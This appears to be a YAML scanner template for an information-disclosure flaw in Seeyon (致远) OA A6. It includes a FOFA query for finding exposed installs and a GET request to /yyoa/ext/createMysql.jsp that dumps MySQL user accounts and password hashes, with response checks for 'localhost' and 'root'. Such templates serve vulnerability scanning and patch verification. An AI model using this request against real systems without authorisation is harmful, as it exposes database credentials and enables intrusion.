product: 致远OA
vName: 致远OA A6 createMysql.jsp 数据库敏感信息泄漏
type: 信息泄漏
vID: [ ]
level: 3
vDesc: 该漏洞泄露了数据库用户的账号，密码hash。访问该文件直接执行了Select * from mysql.user;并回显
version: A6
note: ''
search:
  FOFA: app="致远互联-OA"
protocol: http
link: https://cn-sec.com/archives/1528635.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /yyoa/ext/createMysql.jsp
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - localhost
              - 'root'
            logic: and